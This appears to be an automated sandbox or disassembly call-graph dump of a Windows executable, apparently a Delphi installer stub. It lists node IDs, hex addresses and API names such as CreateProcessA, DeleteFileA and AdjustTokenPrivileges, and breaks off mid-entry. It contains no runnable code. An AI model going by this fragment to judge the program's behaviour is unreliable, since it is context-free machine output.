5757->5758 5759 405930 5 API calls 5758->5759 5760 40586b 5759->5760 5760->5760 5768 40955b 5761->5768 5762 409590 5765 40959d GetUserDefaultLangID 5762->5765 5769 409592 5762->5769 5763 409594 5779 407024 GetModuleHandleA GetProcAddress 5763->5779 5765->5769 5767 40956f 5773 409884 5767->5773 5768->5762 5768->5763 5768->5767 5769->5767 5770 4095cb GetACP 5769->5770 5771 4095ef 5769->5771 5770->5767 5770->5769 5771->5767 5772 409615 GetACP 5771->5772 5772->5767 5772->5771 5774 40988c 5773->5774 5778 4098c6 5773->5778 5775 403420 4 API calls 5774->5775 5774->5778 5776 4098c0 5775->5776 5837 408e80 5776->5837 5778->5654 5780 407067 5779->5780 5781 40705e 5779->5781 5782 407070 5780->5782 5783 4070a8 5780->5783 5792 403198 4 API calls 5781->5792 5800 406f68 5782->5800 5785 406f68 RegOpenKeyExA 5783->5785 5787 4070c1 5785->5787 5786 407089 5788 4070de 5786->5788 5803 406f5c 5786->5803 5787->5788 5789 406f5c 6 API calls 5787->5789 5790 40322c 4 API calls 5788->5790 5793 4070d5 RegCloseKey 5789->5793 5794 4070eb 5790->5794 5796 407120 5792->5796 5793->5788 5806 4032fc 5794->5806 5798 403198 4 API calls 5796->5798 5799 407128 5798->5799 5799->5769 5801 406f73 5800->5801 5802 406f79 RegOpenKeyExA 5800->5802 5801->5802 5802->5786 5820 406e10 5803->5820 5807 403300 5806->5807 5808 40333f 5806->5808 5809 4031e8 5807->5809 5810 40330a 5807->5810 5808->5781 5811 4031fc 5809->5811 5817 403254 4 API calls 5809->5817 5812 403334 5810->5812 5813 40331d 5810->5813 5815 403228 5811->5815 5819 4025ac 4 API calls 5811->5819 5816 4034f0 4 API calls 5812->5816 5814 4034f0 4 API calls 5813->5814 5818 403322 5814->5818 5815->5781 5816->5818 5817->5811 5818->5781 5819->5815 5821 406e36 RegQueryValueExA 5820->5821 5826 406e7b 5821->5826 5828 406e59 5821->5828 5822 406e73 5824 403198 4 API calls 5822->5824 5823 403198 4 API calls 5825 406f47 RegCloseKey 5823->5825 5824->5826 5825->5788 5826->5823 5827 403278 4 API calls 5827->5828 5828->5822 5828->5826 5828->5827 5829 403420 4 API calls 5828->5829 5830 406eb0 RegQueryValueExA 5829->5830 5830->5821 5831 406ecc 5830->5831 5831->5826 5832 4034f0 4 API calls 5831->5832 5833 406f0e 5832->5833 5834 406f20 5833->5834 5836 403420 4 API calls 5833->5836 5835 4031e8 4 API calls 5834->5835 5835->5826 5836->5834 5838 408e8e 5837->5838 5840 408ea6 5838->5840 5850 408e18 5838->5850 5841 408e18 4 API calls 5840->5841 5842 408eca 5840->5842 5841->5842 5843 407918 InterlockedExchange 5842->5843 5844 408ee5 5843->5844 5845 408e18 4 API calls 5844->5845 5847 408ef8 5844->5847 5845->5847 5846 408e18 4 API calls 5846->5847 5847->5846 5848 403278 4 API calls 5847->5848 5849 408f27 5847->5849 5848->5847 5849->5778 5851 405880 4 API calls 5850->5851 5852 408e29 5851->5852 5852->5840 5902 406a58 5853->5902 5856 406d26 5858 406a58 5 API calls 5856->5858 5860 406d72 5856->5860 5859 406d36 5858->5859 5861 406d42 5859->5861 5863 406a34 7 API calls 5859->5863 5910 406888 5860->5910 5861->5860 5866 406a58 5 API calls 5861->5866 5872 406d67 5861->5872 5863->5861 5868 406d5b 5866->5868 5867 406638 5 API calls 5869 406d87 5867->5869 5870 406a34 7 API calls 5868->5870 5868->5872 5871 40322c 4 API calls 5869->5871 5870->5872 5873 406d91 5871->5873 5872->5860 5922 406cc8 GetWindowsDirectoryA 5872->5922 5874 4031b8 4 API calls 5873->5874 5875 406dab 5874->5875 5875->5698 5877 409244 5876->5877 5878 406638 5 API calls 5877->5878 5879 40925d 5878->5879 5880 40322c 4 API calls 5879->5880 5887 409268 5880->5887 5882 406978 6 API calls 5882->5887 5883 4033b4 4 API calls 5883->5887 5884 408dd8 4 API calls 5884->5887 5885 405880 4 API calls 5885->5887 5887->5882 5887->5883 5887->5884 5887->5885 5888 4092e4 5887->5888 5962 4091b0 5887->5962 5970 409034 5887->5970 5889 40322c 4 API calls 5888->5889 5890 4092ef 5889->5890 5891 4031b8 4 API calls 5890->5891 5892 409309 5891->5892 5893 403198 4 API calls 5892->5893 5894 409311 5893->5894 5894->5698 5896 405198 19 API calls 5895->5896 5897 404ca2 5896->5897 5897->5698 5899 408dc8 5898->5899 5998 408c80 5899->5998 5903 4034f0 4 API calls 5902->5903 5904 406a6b 5903->5904 5905 406a82 GetEnvironmentVariableA 5904->5905 5909 406a95 5904->5909 5924 406dec 5904->5924 5905->5904 5906 406a8e 5905->5906 5907 403198 4 API calls 5906->5907 5907->5909 5909->5856 5919 406a34 5909->5919 5911 403414 5910->5911 5912 4068ab GetFullPathNameA 5911->5912 5913 4068b7 5912->5913 5914 4068ce 5912->5914 5913->5914 5915 4068bf 5913->5915 5916 40322c 4 API calls 5914->5916 5917 403278 4 API calls 5915->5917 5918 4068cc 5916->5918 5917->5918 5918->5867 5928 4069dc 5919->5928 5923 406ce9 5922->5923 5923->5860 5925 406dfa 5924->5925 5926 4034f0 4 API calls 5925->5926 5927 406e08 5926->5927 5927->5904 5935 406978 5928->5935 5930 4069fe 5931 406a06 GetFileAttributesA 5930->5931 5932 406a1b 5931->5932 5933 403198 4 API calls 5932->5933 5934 406a23 5933->5934 5934->5856 5945 406744 5935->5945 5937 4069b0 5940 4069c6 5937->5940 5941 4069bb 5937->5941 5939 406989 5939->5937 5952 406970 CharPrevA 5939->5952 5953 403454 5940->5953 5942 40322c 4 API calls 5941->5942 5944 4069c4 5942->5944 5944->5930 5948 406755 5945->5948 5946 4067b9 5947 406680 IsDBCSLeadByte 5946->5947 5949 4067b4 5946->5949 5947->5949 5948->5946 5950 406773 5948->5950 5949->5939 5950->5949 5960 406680 IsDBCSLeadByte 5950->5960 5952->5939 5954 403486 5953->5954 5955 403459 5953->5955 5956 403198 4 API calls 5954->5956 5955->5954 5958 40346d 5955->5958 5957 40347c 5956->5957 5957->5944 5959 403278 4 API calls 5958->5959 5959->5957 5961 406694 5960->5961 5961->5950 5963 403198 4 API calls 5962->5963 5966 4091d1 5963->5966 5967 4091fe 5966->5967 5979 4032a8 5966->5979 5982 403494 5966->5982 5968 403198 4 API calls 5967->5968 5969 409213 5968->5969 5969->5887 5986 408f70 5970->5986 5972 40904a 5973 40904e 5972->5973 5992 406a48 5972->5992 5973->5887 5976 409081 5995 408fac 5976->5995 5980 403278 4 API calls 5979->5980 5981 4032b5 5980->5981 5981->5966 5983 403498 5982->5983 5985 4034c3 5982->5985 5984 4034f0 4 API calls 5983->5984 5984->5985 5985->5966 5987 408f7a 5986->5987 5988 408f7e 5986->5988 5987->5972 5989 408fa0 SetLastError 5988->5989 5990 408f87 Wow64DisableWow64FsRedirection 5988->5990 5991 408f9b 5989->5991 5990->5991 5991->5972 5993 4069dc 7 API calls 5992->5993 5994 406a52 GetLastError 5993->5994 5994->5976 5996 408fb1 Wow64RevertWow64FsRedirection 5995->5996 5997 408fbb 5995->5997 5996->5997 5997->5887 5999 403198 4 API calls 5998->5999 6005 408cb1 5998->6005 5999->6005 6000 408cdc 6001 4031b8 4 API calls 6000->6001 6003 408d69 6001->6003 6002 408cc8 6006 4032fc 4 API calls 6002->6006 6003->5698 6004 403278 4 API calls 6004->6005 6005->6000 6005->6002 6005->6004 6007 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6005->6007 6006->6000 6007->6005 6009 406744 IsDBCSLeadByte 6008->6009 6011 406835 6009->6011 6010 40687f 6010->5710 6011->6010 6012 406680 IsDBCSLeadByte 6011->6012 6012->6011 6014 4068f3 6013->6014 6015 406820 IsDBCSLeadByte 6014->6015 6017 4068fe 6015->6017 6016 4066ea 6016->5715 6016->5716 6017->6016 6018 406680 IsDBCSLeadByte 6017->6018 6018->6017 6020 406957 6019->6020 6021 40695b 6019->6021 6020->5729 6024 406970 CharPrevA 6021->6024 6023 40696c 6023->5729 6024->6023 6026 402bd5 RaiseException 6025->6026 6027 402be6 6025->6027 6026->6027 6027->5753 6280 402e64 6281 402e69 6280->6281 6282 402e7a RtlUnwind 6281->6282 6283 402e5e 6281->6283 6284 402e9d 6282->6284 6301 40667c IsDBCSLeadByte 6302 406694 6301->6302 6714 403f7d 6715 403fa2 6714->6715 6718 403f84 6714->6718 6717 403e8e 4 API calls 6715->6717 6715->6718 6716 403f8c 6717->6718 6718->6716 6719 402674 4 API calls 6718->6719 6720 403fca 6719->6720 6727 403d02 6734 403d12 6727->6734 6728 403ddf ExitProcess 6729 403db8 6731 403cc8 4 API calls 6729->6731 6730 403dea 6732 403dc2 6731->6732 6733 403cc8 4 API calls 6732->6733 6735 403dcc 6733->6735 6734->6728 6734->6729 6734->6730 6734->6734 6737 403da4 6734->6737 6738 403d8f MessageBoxA 6734->6738 6747 4019dc 6735->6747 6743 403fe4 6737->6743 6738->6729 6740 403dd1 6740->6728 6740->6730 6744 403fe8 6743->6744 6745 403f07 4 API calls 6744->6745 6746 404006 6745->6746 6748 401abb 6747->6748 6749 4019ed 6747->6749 6748->6740 6750 401a04 RtlEnterCriticalSection 6749->6750 6751 401a0e LocalFree 6749->6751 6750->6751 6752 401a41 6751->6752 6753 401a2f VirtualFree 6752->6753 6754 401a49 6752->6754 6753->6752 6755 401a70 LocalFree 6754->6755 6756 401a87 6754->6756 6755->6755 6755->6756 6757 401aa9 RtlDeleteCriticalSection 6756->6757 6758 401a9f RtlLeaveCriticalSection 6756->6758 6757->6740 6758->6757 6311 404206 6312 4041cc 6311->6312 6315 40420a 6311->6315 6313 404282 6314 403154 4 API calls 6316 404323 6314->6316 6315->6313 6315->6314 6317 402c08 6320 402c82 6317->6320 6321 402c19 6317->6321 6318 402c56 RtlUnwind 6319 403154 4 API calls 6318->6319 6319->6320 6321->6318 6321->6320 6324 402b28 6321->6324 6325 402b31 RaiseException 6324->6325 6326 402b47 6324->6326 6325->6326 6326->6318 6327 408c10 6328 408c17 6327->6328 6329 403198 4 API calls 6328->6329 6337 408cb1 6329->6337 6330 408cdc 6331 4031b8 4 API calls 6330->6331 6333 408d69 6331->6333 6332 408cc8 6335 4032fc 4 API calls 6332->6335 6334 403278 4 API calls 6334->6337 6335->6330 6336 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6336->6337 6337->6330 6337->6332 6337->6334 6337->6336 6338 40a011 6339 40a036 6338->6339 6340 407918 InterlockedExchange 6339->6340 6342 40a060 6340->6342 6341 40a070 6348 4076ac SetEndOfFile 6341->6348 6342->6341 6343 409aa0 4 API calls 6342->6343 6343->6341 6345 40a08c 6346 4025ac 4 API calls 6345->6346 6347 40a0c3 6346->6347 6349 4076c3 6348->6349 6350 4076bc 6348->6350 6349->6345 6351 40748c 21 API calls 6350->6351 6351->6349 6763 409916 6764 409918 6763->6764 6765 40993a 6764->6765 6766 409956 CallWindowProcA 6764->6766 6766->6765 6079 407017 6080 407008 SetErrorMode 6079->6080 6356 403018 6357 403070 6356->6357 6358 403025 6356->6358 6359 40302a RtlUnwind 6358->6359 6360 40304e 6359->6360 6362 402f78 6360->6362 6363 402be8 6360->6363 6364 402bf1 RaiseException 6363->6364 6365 402c04 6363->6365 6364->6365 6365->6357 6773 409918 6774 409927 6773->6774 6775 40993a 6773->6775 6774->6775 6776 409956 CallWindowProcA 6774->6776 6776->6775 6370 40901e 6371 409010 6370->6371 6372 408fac Wow64RevertWow64FsRedirection 6371->6372 6373 409018 6372->6373 6374 409020 SetLastError 6375 409029 6374->6375 6386 403a28 ReadFile 6387 403a46 6386->6387 6388 403a49 GetLastError 6386->6388 6217 40762c ReadFile 6218 407663 6217->6218 6219 40764c 6217->6219 6220 407652 GetLastError 6219->6220 6221 40765c 6219->6221 6220->6218 6220->6221 6222 40748c 21 API calls 6221->6222 6222->6218 6393 40a02c 6394 409aa0 4 API calls 6393->6394 6395 40a031 6394->6395 6396 40a036 6395->6396 6397 402f24 5 API calls 6395->6397 6398 407918 InterlockedExchange 6396->6398 6397->6396 6399 40a060 6398->6399 6400 40a070 6399->6400 6401 409aa0 4 API calls 6399->6401 6402 4076ac 22 API calls 6400->6402 6401->6400 6403 40a08c 6402->6403 6404 4025ac 4 API calls 6403->6404 6405 40a0c3 6404->6405 6777 40712e 6778 407118 6777->6778 6779 403198 4 API calls 6778->6779 6780 407120 6779->6780 6781 403198 4 API calls 6780->6781 6782 407128 6781->6782 6783 408f30 6786 408dfc 6783->6786 6787 408e05 6786->6787 6788 403198 4 API calls 6787->6788 6789 408e13 6787->6789 6788->6787 6790 403932 6791 403924 6790->6791 6794 40374c 6791->6794 6793 40392c 6795 403766 6794->6795 6796 403759 6794->6796 6795->6793 6796->6795 6797 403779 VariantClear 6796->6797 6797->6793 6028 4075c4 SetFilePointer 6029 4075f7 6028->6029 6030 4075e7 GetLastError 6028->6030 6030->6029 6031 4075f0 6030->6031 6032 40748c 21 API calls 6031->6032 6032->6029 6406 405ac4 6407 405acc 6406->6407 6411 405ad4 6406->6411 6408 405ad2 6407->6408 6409 405adb 6407->6409 6413 405a3c 6408->6413 6410 405930 5 API calls 6409->6410 6410->6411 6420 405a44 6413->6420 6414 405a5e 6416 405a63 6414->6416 6417 405a7a 6414->6417 6415 403154 4 API calls 6415->6420 6418 405930 5 API calls 6416->6418 6419 403154 4 API calls 6417->6419 6421 405a76 6418->6421 6422 405a7f 6419->6422 6420->6414 6420->6415 6424 403154 4 API calls 6421->6424 6423 4059a0 19 API calls 6422->6423 6423->6421 6425 405aa8 6424->6425 6426 403154 4 API calls 6425->6426 6427 405ab6 6426->6427 6427->6411 6428 4076c8 WriteFile 6429 4076e8 6428->6429 6430 4076ef 6428->6430 6431 40748c 21 API calls 6429->6431 6432 407700 6430->6432 6433 4073ec 20 API calls 6430->6433 6431->6430 6433->6432 6434 40a2ca 6443 4096fc 6434->6443 6437 402f24 5 API calls 6438 40a2d4 6437->6438 6439 403198 4 API calls 6438->6439 6440 40a2f3 6439->6440 6441 403198 4 API calls 6440->6441 6442 40a2fb 6441->6442 6452 40569c 6443->6452 6445 409717 6447 409745 6445->6447 6458 40720c 6445->6458 6449 403198 4 API calls 6447->6449 6448 409735 6451 40973d MessageBoxA 6448->6451 6450 40975a 6449->6450 6450->6437 6451->6447 6453 403154 4 API calls 6452->6453 6454 4056a1 6453->6454 6455 4056b9 6454->6455 6456 403154 4 API calls 6454->6456 6455->6445 6457 4056af 6456->6457 6457->6445 6459 40569c 4 API calls 6458->6459 6460 40721b 6459->6460 6461 407221 6460->6461 6462 40722f 6460->6462 6463 40322c 4 API calls 6461->6463 6464 40723f 6462->6464 6466 40724b 6462->6466 6467 40722d 6463->6467 6469 4071d0 6464->6469 6476 4032b8 6466->6476 6467->6448 6470 40322c 4 API calls 6469->6470 6471 4071df 6470->6471 6472 4071fc 6471->6472 6473 406950 CharPrevA 6471->6473 6472->6467 6474 4071eb 6473->6474 6474->6472 6475 4032fc 4 API calls 6474->6475 6475->6472 6477 403278 4 API calls 6476->6477 6478 4032c2 6477->6478 6478->6467 6479 402ccc 6480 402cdd 6479->6480 6484 402cfe 6479->6484 6481 402d88 RtlUnwind 6480->6481 6483 402b28 RaiseException 6480->6483 6480->6484 6482 403154 4 API calls 6481->6482 6482->6484 6485 402d7f 6483->6485 6485->6481 6806 403fcd 6807 403f07 4 API calls 6806->6807 6808 403fd6 6807->6808 6809 403e9c 4 API calls 6808->6809 6810 403fe2 6809->6810 5464 4024d0 5465 4024e4 5464->5465 5466 4024f7 5464->5466 5503 401918 RtlInitializeCriticalSection 5465->5503 5468 402518 5466->5468 5469 40250e RtlEnterCriticalSection 5466->5469 5480 402300 5468->5480 5469->5468 5472 4024ed 5474 402525 5477 402581 5474->5477 5478 402577 RtlLeaveCriticalSection 5474->5478 5476 402531 5476->5474 5510 40215c 5476->5510 5478->5477 5481 402314 5480->5481 5482 402335 5481->5482 5483 4023b8 5481->5483 5485 402344 5482->5485 5524 401b74 5482->5524 5483->5485 5488 402455 5483->5488 5527 401d80 5483->5527 5535 401e84 5483->5535 5485->5474 5490 401fd4 5485->5490 5488->5485 5531 401d00 5488->5531 5491 401fe8 5490->5491 5492 401ffb 5490->5492 5493 401918 4 API calls 5491->5493 5494 402012 RtlEnterCriticalSection 5492->5494 5497 40201c 5492->5497 5495 401fed 5493->5495 5494->5497 5495->5492 5496 401ff1 5495->5496 5500 402052 5496->5500 5497->5500 5617 401ee0 5497->5617 5500->5476 5501 402147 5501->5476 5502 40213d RtlLeaveCriticalSection 5502->5501 5504 40193c RtlEnterCriticalSection 5503->5504 5505 401946 5503->5505 5504->5505 5506 401964 LocalAlloc 5505->5506 5507 40197e 5506->5507 5508 4019c3 RtlLeaveCriticalSection 5507->5508 5509 4019cd 5507->5509 5508->5509 5509->5466 5509->5472 5511 40217a 5510->5511 5512 402175 5510->5512 5513 4021ab RtlEnterCriticalSection 5511->5513 5516 4021b5 5511->5516 5520 40217e 5511->5520 5514 401918 4 API calls 5512->5514 5513->5516 5514->5511 5515 4021c1 5518 4022e3 RtlLeaveCriticalSection 5515->5518 5519 4022ed 5515->5519 5516->5515 5517 402244 5516->5517 5522 402270 5516->5522 5517->5520 5521 401d80 7 API calls 5517->5521 5518->5519 5519->5474 5520->5474 5521->5520 5522->5515 5523 401d00 7 API calls 5522->5523 5523->5515 5525 40215c 9 API calls 5524->5525 5526 401b95 5525->5526 5526->5485 5528 401d92 5527->5528 5529 401d89 5527->5529 5528->5483 5529->5528 5530 401b74 9 API calls 5529->5530 5530->5528 5532 401d1e 5531->5532 5533 401d4e 5531->5533 5532->5485 5533->5532 5540 401c68 5533->5540 5595 401768 5535->5595 5537 401e99 5538 401ea6 5537->5538 5606 401dcc 5537->5606 5538->5483 5541 401c7a 5540->5541 5542 401c9d 5541->5542 5543 401caf 5541->5543 5553 40188c 5542->5553 5544 40188c 3 API calls 5543->5544 5546 401cad 5544->5546 5547 401cc5 5546->5547 5563 401b44 5546->5563 5547->5532 5549 401cd4 5550 401cee 5549->5550 5568 401b98 5549->5568 5573 4013a0 5550->5573 5554 4018b2 5553->5554 5562 40190b 5553->5562 5577 401658 5554->5577 5559 4018e6 5561 4013a0 LocalAlloc 5559->5561 5559->5562 5561->5562 5562->5546 5564 401b61 5563->5564 5565 401b52 5563->5565 5564->5549 5566 401d00 9 API calls 5565->5566 5567 401b5f 5566->5567 5567->5549 5569 401bab 5568->5569 5570 401b9d 5568->5570 5569->5550 5571 401b74 9 API calls 5570->5571 5572 401baa 5571->5572 5572->5550 5574 4013ab 5573->5574 5575 4013c6 5574->5575 5576 4012e4 LocalAlloc 5574->5576 5575->5547 5576->5575 5579 40168f 5577->5579 5578 4016cf 5581 40132c 5578->5581 5579->5578 5580 4016a9 VirtualFree 5579->5580 5580->5579 5582 401348 5581->5582 5589 4012e4 5582->5589 5585 40150c 5587 40153b 5585->5587 5586 401594 5586->5559 5587->5586 5588 401568 VirtualFree 5587->5588 5588->5587 5592 40128c 5589->5592 5593 401298 LocalAlloc 5592->5593 5594 4012aa 5592->5594 5593->5594 5594->5559 5594->5585 5596 401787 5595->5596 5597 40183b 5596->5597 5598 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5596->5598 5600 40132c LocalAlloc 5596->5600 5601 401821 5596->5601 5602 4017d6 5596->5602 5603 4017e7 5597->5603 5613 4015c4 5597->5613 5598->5596 5600->5596 5604 40150c VirtualFree 5601->5604 5605 40150c VirtualFree 5602->5605 5603->5537 5604->5603 5605->5603 5607 401d80 9 API calls 5606->5607 5608 401de0 5607->5608 5609 40132c LocalAlloc 5608->5609 5610 401df0 5609->5610 5611 401b44 9 API calls 5610->5611 5612 401df8 5610->5612 5611->5612 5612->5538 5614 40160a 5613->5614 5615 401626 VirtualAlloc 5614->5615 5616 40163a 5614->5616 5615->5614 5615->5616 5616->5603 5621 401ef0 5617->5621 5618 401f1c 5619 401d00 9 API calls 5618->5619 5622 401f40 5618->5622 5619->5622 5621->5618 5621->5622 5623 401e58 5621->5623 5622->5501 5622->5502 5628 4016d8 5623->5628 5626 401dcc 9 API calls 5627 401e75 5626->5627 5627->5621 5632 4016f4 5628->5632 5630 4016fe 5631 4015c4 VirtualAlloc 5630->5631 5636 40170a 5631->5636 5632->5630 5633 40175b 5632->5633 5634 40132c LocalAlloc 5632->5634 5635 40174f 5632->5635 5638 401430 5632->5638 5633->5626 5633->5627 5634->5632 5637 40150c VirtualFree 5635->5637 5636->5633 5637->5633 5639 40143f VirtualAlloc 5638->5639 5641 40146c 5639->5641 5642 40148f 5639->5642 5643 4012e4 LocalAlloc 5641->5643 5642->5632 5644 401478 5643->5644 5644->5642 5645 40147c VirtualFree 5644->5645 5645->5642 6486 4028d2 6487 4028da 6486->6487 6488 403554 4 API calls 6487->6488 6489 4028ef 6487->6489 6488->6487 6490 4025ac 4 API calls 6489->6490 6491 4028f4 6490->6491 6811 4019d3 6812 4019ba 6811->6812 6813 4019c3 RtlLeaveCriticalSection 6812->6813 6814 4019cd 6812->6814 6813->6814 6033 407fd4 6034 407fe6 6033->6034 6036 407fed 6033->6036 6044 407f10 6034->6044 6037 408021 6036->6037 6039 408015 6036->6039 6040 408017 6036->6040 6038 40804e 6037->6038 6041 407d7c 19 API calls 6037->6041 6058 407e2c 6039->6058 6055 407d7c 6040->6055 6041->6038 6045 407f25 6044->6045 6046 407d7c 19 API calls 6045->6046 6047 407f34 6045->6047 6046->6047 6048 407f6e 6047->6048 6049 407d7c 19 API calls 6047->6049 6050 407f82 6048->6050 6051 407d7c 19 API calls 6048->6051 6049->6048 6054 407fae 6050->6054 6065 407eb8 6050->6065 6051->6050 6054->6036 6068 4058b4 6055->6068 6057 407d9e 6057->6037 6059 405184 19 API calls 6058->6059 6060 407e57 6059->6060 6076 407de4 6060->6076 6062 407e5f 6063 403198 4 API calls 6062->6063 6064 407e74 6063->6064 6064->6037 6066 407ec7 VirtualFree 6065->6066 6067 407ed9 VirtualAlloc 6065->6067 6066->6067 6067->6054 6069 4058c0 6068->6069 6070 405184 19 API calls 6069->6070 6071 4058ed 6070->6071 6072 4031e8 4 API calls 6071->6072 6073 4058f8 6072->6073 6074 403198 4 API calls 6073->6074 6075 40590d 6074->6075 6075->6057 6077 4058b4 19 API calls 6076->6077 6078 407e06 6077->6078 6078->6062 6496 40a0d5 6497 40a105 6496->6497 6498 40a10f CreateWindowExA SetWindowLongA 6497->6498 6499 405184 19 API calls 6498->6499 6500 40a192 6499->6500 6501 4032fc 4 API calls 6500->6501 6502 40a1a0 6501->6502 6503 4032fc 4 API calls 6502->6503 6504 40a1ad 6503->6504 6505 406b7c 5 API calls 6504->6505 6506 40a1b9 6505->6506 6507 4032fc 4 API calls 6506->6507 6508 40a1c2 6507->6508 6509 4099a4 29 API calls 6508->6509 6510 40a1d4 6509->6510 6511 409884 5 API calls 6510->6511 6512 40a1e7 6510->6512 6511->6512 6513 40a220 6512->6513 6514 4094d8 9 API calls 6512->6514 6515 40a239 6513->6515 6518 40a233 RemoveDirectoryA 6513->6518 6514->6513 6516 40a242 73A25CF0 6515->6516 6517 40a24d 6515->6517 6516->6517 6519 40a275 6517->6519 6520 40357c 4 API calls 6517->6520 6518->6515 6521 40a26b 6520->6521 6522 4025ac 4 API calls 6521->6522 6522->6519 6081 40a0e7 6082 40a0eb SetLastError 6081->6082 6113 409648 GetLastError 6082->6113 6085 40a105 6087 40a10f CreateWindowExA SetWindowLongA 6085->6087 6086 402f24 5 API calls 6086->6085 6088 405184 19 API calls 6087->6088 6089 40a192 6088->6089 6090 4032fc 4 API calls 6089->6090 6091 40a1a0 6090->6091 6092 4032fc 4 API calls 6091->6092 6093 40a1ad 6092->6093 6126 406b7c GetCommandLineA 6093->6126 6096 4032fc 4 API calls 6097 40a1c2 6096->6097 6131 4099a4 6097->6131 6100 409884 5 API calls 6101 40a1e7 6100->6101 6102 40a220 6101->6102 6103 40a207 6101->6103 6105 40a239 6102->6105 6108 40a233 RemoveDirectoryA 6102->6108 6147 4094d8 6103->6147 6106 40a242 73A25CF0 6105->6106 6107 40a24d 6105->6107 6106->6107 6109 40a275 6107->6109 6155 40357c 6107->6155 6108->6105 6111 40a26b 6112 4025ac 4 API calls 6111->6112 6112->6109 6114 404c84 19 API calls 6113->6114 6115 40968f 6114->6115 6116 407284 5 API calls 6115->6116 6117 40969f 6116->6117 6118 408da8 4 API calls 6117->6118 6119 4096b4 6118->6119 6120 405880 4 API calls 6119->6120 6121 4096c3 6120->6121 6122 4031b8 4 API calls 6121->6122 6123 4096e2 6122->6123 6124 403198 4 API calls 6123->6124 6125 4096ea 6124->6125 6125->6085 6125->6086 6127 406af0 4 API calls 6126->6127 6128 406ba1 6127->6128 6129 403198 4 API calls 6128->6129 6130 406bbf 6129->6130 6130->6096 6132 4033b4 4 API calls 6131->6132 6133 4099df 6132->6133 6134 409a11 CreateProcessA 6133->6134 6135 409a24 CloseHandle 6134->6135 6136 409a1d 6134->6136 6138 409a2d 6135->6138 6137 409648 21 API calls 6136->6137 6137->6135 6168 409978 6138->6168 6141 409a49 6142 409978 3 API calls 6141->6142 6143 409a4e GetExitCodeProcess CloseHandle 6142->6143 6144 409a6e 6143->6144 6145 403198 4 API calls 6144->6145 6146 409a76 6145->6146 6146->6100 6146->6101 6148 409532 6147->6148 6149 4094eb 6147->6149 6148->6102 6149->6148 6150 4094f3 Sleep 6149->6150 6151 409503 Sleep 6149->6151 6153 40951a GetLastError 6149->6153 6172 408fbc 6149->6172 6150->6149 6151->6149 6153->6148 6154 409524 GetLastError 6153->6154 6154->6148 6154->6149 6156 403591 6155->6156 6164 4035a0 6155->6164 6160 4035d0 6156->6160 6161 40359b 6156->6161 6163 4035b6 6156->6163 6157 4035b1 6162 403198 4 API calls 6157->6162 6158 4035b8 6159 4031b8 4 API calls 6158->6159 6159->6163 6160->6163 6166 40357c 4 API calls 6160->6166 6161->6164 6165 4035ec 6161->6165 6162->6163 6163->6111 6164->6157 6164->6158 6165->6163 6180 403554 6165->6180 6166->6160 6169 40998c PeekMessageA 6168->6169 6170 409980 TranslateMessage DispatchMessageA 6169->6170 6171 40999e MsgWaitForMultipleObjects 6169->6171 6170->6169 6171->6138 6171->6141 6173 408f70 2 API calls 6172->6173 6174 408fd2 6173->6174 6175 408fd6 6174->6175 6176 408ff2 DeleteFileA GetLastError 6174->6176 6175->6149 6177 409010 6176->6177 6178 408fac Wow64RevertWow64FsRedirection 6177->6178 6179 409018 6178->6179 6179->6149 6181 403566 6180->6181 6183 403578 6181->6183 6184 403604 6181->6184 6183->6165 6185 40357c 6184->6185 6186 4035a0 6185->6186 6190 4035d0 6185->6190 6191 40359b 6185->6191 6193 4035b6 6185->6193 6187 4035b1 6186->6187 6188 4035b8 6186->6188 6192 403198 4 API calls 6187->6192 6189 4031b8 4 API calls 6188->6189 6189->6193 6190->6193 6195 40357c 4 API calls 6190->6195 6191->6186 6194 4035ec 6191->6194 6192->6193 6193->6181 6194->6193 6196 403554 4 API calls 6194->6196 6195->6190 6196->6194 6818 402be9 RaiseException 6819 402c04 6818->6819 6529 402af2 6530 402afe 6529->6530 6533 402ed0 6530->6533 6534 403154 4 API calls 6533->6534 6536 402ee0 6534->6536 6535 402b03 6536->6535 6538 402b0c 6536->6538 6539 402b25 6538->6539 6540 402b15 RaiseException 6538->6540 6539->6535 6540->6539 6820 402dfa 6821 402e26 6820->6821 6822 402e0d 6820->6822 6824 402ba4 6822->6824 6825 402bc9 6824->6825 6826 402bad 6824->6826 6825->6821 6827 402bb5 RaiseException 6826->6827 6827->6825 6828 4075fa GetFileSize 6829 407626 6828->6829 6830 407616 GetLastError 6828->6830 6830->6829 6831 40761f 6830->6831 6832 40748c 21 API calls 6831->6832 6832->6829 6833 406ffb 6834 407008 SetErrorMode 6833->6834 6545 403a80 CloseHandle 6546 403a90 6545->6546 6547 403a91 GetLastError 6545->6547 6548 40a282 6549 40a1f4 6548->6549 6550 40a220 6549->6550 6551 4094d8 9 API calls 6549->6551 6552 40a239 6550->6552 6555 40a233 RemoveDirectoryA 6550->6555 6551->6550 6553 40a242 73A25CF0 6552->6553 6554 40a24d 6552->6554 6553->6554 6556 40a275 6554->6556 6557 40357c 4 API calls 6554->6557 6555->6552 6558 40a26b 6557->6558 6559 4025ac 4 API calls 6558->6559 6559->6556 6560 404283 6561 4042c3 6560->6561 6562 403154 4 API calls 6561->6562 6563 404323 6562->6563 6835 404185 6836 4041ff 6835->6836 6837 4041cc 6836->6837 6838 403154 4 API calls 6836->6838 6839 404323 6838->6839 6564 40a287 6565 40a290 6564->6565 6567 40a2bb 6564->6567 6574 409448 6565->6574 6569 403198 4 API calls 6567->6569 6568 40a295 6568->6567 6571 40a2b3 MessageBoxA 6568->6571 6570 40a2f3 6569->6570 6572 403198 4 API calls 6570->6572 6571->6567 6573 40a2fb 6572->6573 6575 409454 GetCurrentProcess OpenProcessToken 6574->6575 6576 4094af ExitWindowsEx 6574->6576 6577 409466 6575->6577 6578 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6575->6578 6576->6577 6577->6568 6578->6576 6578->6577 6579 403e87 6581 403e4c 6579->6581 6580 403e67 6586 403e78 6580->6586 6592 402674 6580->6592 6581->6580 6582 403e62 6581->6582 6583 403e7b 6581->6583 6588 403cc8 6582->6588 6585 402674 4 API calls 6583->6585 6585->6586 6589 403cd6 6588->6589 6590 402674 4 API calls 6589->6590 6591 403ceb 6589->6591 6590->6591 6591->6580 6593 403154 4 API calls 6592->6593 6594 40267a 6593->6594 6594->6586 6599 407e90 6600 407eb8 VirtualFree 6599->6600 6601 407e9d 6600->6601 6848 403991 6849 403983 6848->6849 6850 40374c VariantClear 6849->6850 6851 40398b 6850->6851 6852 